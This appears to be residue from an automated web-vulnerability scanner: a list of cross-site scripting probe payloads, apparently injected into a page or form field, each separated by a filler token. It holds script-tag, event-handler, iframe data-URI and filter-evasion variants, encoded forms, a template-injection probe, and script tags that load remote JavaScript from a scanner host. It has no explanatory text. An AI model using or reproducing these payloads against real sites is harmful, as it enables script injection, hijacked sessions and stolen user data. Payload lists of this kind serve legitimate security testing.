555<ScRiPt >zt1u(9573)</ScRiPt>


lxbfYeaa

dfb__${98991*97996}__::.x


lxbfYeaa

555<svg ?onload=TnBV(9629);>


lxbfYeaa

555<ScRiPt >7QKl(9643)</ScRiPt>


lxbfYeaa

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9628'>


lxbfYeaa

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9822'>


lxbfYeaa

555<isindex type=image src=1 onerror=TnBV(9310)>


lxbfYeaa

555<svg ?onload=zt1u(9821);>


lxbfYeaa

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


lxbfYeaa

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9836></ScRiPt>


lxbfYeaa

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9547'>


lxbfYeaa

555<ScR<ScRiPt>IpT>P7FF(9860)</sCr<ScRiPt>IpT>


lxbfYeaa

555<WOMSWQ>0LBA1[!+!]</WOMSWQ>


lxbfYeaa

555<body onload=GcrU(9737)>


lxbfYeaa

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9540></ScRiPt>


lxbfYeaa

555<isindex type=image src=1 onerror=zt1u(9929)>


lxbfYeaa

555<ScRiPt >tgfP(9968)</ScRiPt>


lxbfYeaa

555<body onload=zVXr(9368)>


lxbfYeaa

555<ScR<ScRiPt>IpT>tOiK(9599)</sCr<ScRiPt>IpT>


lxbfYeaa

555<ScRiPt >P7FF(9884)</ScRiPt>


lxbfYeaa

555<img src=//xss.bxss.me/t/dot.gif onload=GcrU(9039)>


lxbfYeaa

555<body onload=TnBV(9297)>


lxbfYeaa

555<WYSTLX>OJWHQ[!+!]</WYSTLX>


lxbfYeaa

555<script>VD8u(9633)</script>


lxbfYeaa

555<img src=//xss.bxss.me/t/dot.gif onload=zVXr(9234)>


lxbfYeaa

555<ScRiPt >DByA(9771)</ScRiPt>


lxbfYeaa

555<ScRiPt >tOiK(9934)</ScRiPt>


lxbfYeaa

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9818'>


lxbfYeaa

555<img src=//xss.bxss.me/t/dot.gif onload=TnBV(9960)>


lxbfYeaa

555<ScRiPt >7QKl(9384)</ScRiPt>


lxbfYeaa

555<img src=xyz OnErRor=GcrU(9604)>


lxbfYeaa

555<ScR<ScRiPt>IpT>VD8u(9696)</sCr<ScRiPt>IpT>


lxbfYeaa

555<svg ?onload=DByA(9742);>


lxbfYeaa

555<img src=xyz OnErRor=zVXr(9551)>


lxbfYeaa

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9006></ScRiPt>


lxbfYeaa

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9237></ScRiPt>


lxbfYeaa

555<body onload=zt1u(9737)>


lxbfYeaa

555<ScRiPt >VD8u(9144)</ScRiPt>


lxbfYeaa

555<script>tgfP(9509)</script>


lxbfYeaa

555<svg ?onload=7QKl(9811);>


lxbfYeaa

555<img/src=">" onerror=alert(9294)>


lxbfYeaa

555<ScRiPt >tOiK(9741)</ScRiPt>


lxbfYeaa

555<isindex type=image src=1 onerror=DByA(9794)>


lxbfYeaa

555<img src=xyz OnErRor=TnBV(9907)>


lxbfYeaa

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9484></ScRiPt>


lxbfYeaa

555<img/src=">" onerror=alert(9371)>


lxbfYeaa

555<isindex type=image src=1 onerror=7QKl(9945)>


lxbfYeaa

555<ScRiPt >P7FF(9634)</ScRiPt>


lxbfYeaa

555<img src=//xss.bxss.me/t/dot.gif onload=zt1u(9683)>


lxbfYeaa

555<svg ?onload=tOiK(9815);>


lxbfYeaa

%35%35%35%3C%53%63%52%69%50%74%20%3E%47%63%72%55%289497%29%3C%2F%73%43%72%69%70%54%3E


lxbfYeaa

555<img/src=">" onerror=alert(9367)>


lxbfYeaa

555<ScR<ScRiPt>IpT>tgfP(9599)</sCr<ScRiPt>IpT>


lxbfYeaa

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9530'>


lxbfYeaa

555<ScRiPt >VD8u(9098)</ScRiPt>


lxbfYeaa

%35%35%35%3C%53%63%52%69%50%74%20%3E%7A%56%58%72%289058%29%3C%2F%73%43%72%69%70%54%3E


lxbfYeaa

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9027'>


lxbfYeaa

555<ScRiPt >tgfP(9496)</ScRiPt>


lxbfYeaa

555<body onload=7QKl(9751)>


lxbfYeaa

555<isindex type=image src=1 onerror=tOiK(9726)>


lxbfYeaa

%35%35%35%3C%53%63%52%69%50%74%20%3E%54%6E%42%56%289804%29%3C%2F%73%43%72%69%70%54%3E


lxbfYeaa

555<svg ?onload=P7FF(9904);>


lxbfYeaa

555u003CScRiPtGcrU(9648)u003C/sCripTu003E


lxbfYeaa

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9968></ScRiPt>


lxbfYeaa

555<img src=//xss.bxss.me/t/dot.gif onload=7QKl(9590)>


lxbfYeaa

555<svg ?onload=VD8u(9915);>


lxbfYeaa

555<img src=xyz OnErRor=zt1u(9327)>


lxbfYeaa

555u003CScRiPtTnBV(9342)u003C/sCripTu003E


lxbfYeaa

555<body onload=DByA(9241)>


lxbfYeaa

555<isindex type=image src=1 onerror=P7FF(9726)>


lxbfYeaa

555u003CScRiPtzVXr(9884)u003C/sCripTu003E


lxbfYeaa

555<img/src=">" onerror=alert(9190)>


lxbfYeaa

555&lt;ScRiPt&gt;GcrU(9568)&lt;/sCripT&gt;


lxbfYeaa

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9810'>


lxbfYeaa

555<img src=//xss.bxss.me/t/dot.gif onload=DByA(9302)>


lxbfYeaa

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9089'>


lxbfYeaa

555<img src=xyz OnErRor=7QKl(9487)>


lxbfYeaa

555<ScRiPt >tgfP(9825)</ScRiPt>


lxbfYeaa

555<isindex type=image src=1 onerror=VD8u(9702)>


lxbfYeaa

%35%35%35%3C%53%63%52%69%50%74%20%3E%7A%74%31%75%289589%29%3C%2F%73%43%72%69%70%54%3E


lxbfYeaa

555&lt;ScRiPt&gt;zVXr(9196)&lt;/sCripT&gt;


lxbfYeaa

555<img src=xyz OnErRor=DByA(9195)>


lxbfYeaa

555<body onload=tOiK(9665)>


lxbfYeaa

555<img/src=">" onerror=alert(9923)>


lxbfYeaa

555&lt;ScRiPt&gt;TnBV(9593)&lt;/sCripT&gt;


lxbfYeaa

?<img zzz onmouseover=GcrU(96161) //?>


lxbfYeaa

555<body onload=P7FF(9218)>


lxbfYeaa

?<img zzz onmouseover=zVXr(95541) //?>


lxbfYeaa

555<input autofocus onfocus=GcrU(9232)>


lxbfYeaa

555<img src=//xss.bxss.me/t/dot.gif onload=tOiK(9143)>


lxbfYeaa

555u003CScRiPtzt1u(9255)u003C/sCripTu003E


lxbfYeaa

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9032'>


lxbfYeaa

%35%35%35%3C%53%63%52%69%50%74%20%3E%37%51%4B%6C%289427%29%3C%2F%73%43%72%69%70%54%3E


lxbfYeaa

?<img zzz onmouseover=TnBV(99871) //?>


lxbfYeaa

555<svg ?onload=tgfP(9518);>


lxbfYeaa

555<img src=//xss.bxss.me/t/dot.gif onload=P7FF(9356)>


lxbfYeaa

555<img/src=">" onerror=alert(9240)>


lxbfYeaa

555<input autofocus onfocus=TnBV(9838)>


lxbfYeaa

555&lt;ScRiPt&gt;zt1u(9400)&lt;/sCripT&gt;


lxbfYeaa

555u003CScRiPt7QKl(9420)u003C/sCripTu003E


lxbfYeaa

555<body onload=VD8u(9765)>


lxbfYeaa

555<img src=xyz OnErRor=tOiK(9663)>


lxbfYeaa

<a HrEF=http://xss.bxss.me></a>


lxbfYeaa

555<input autofocus onfocus=zVXr(9658)>


lxbfYeaa

?<img zzz onmouseover=zt1u(94281) //?>


lxbfYeaa

555<isindex type=image src=1 onerror=tgfP(9100)>


lxbfYeaa

555&lt;ScRiPt&gt;7QKl(9538)&lt;/sCripT&gt;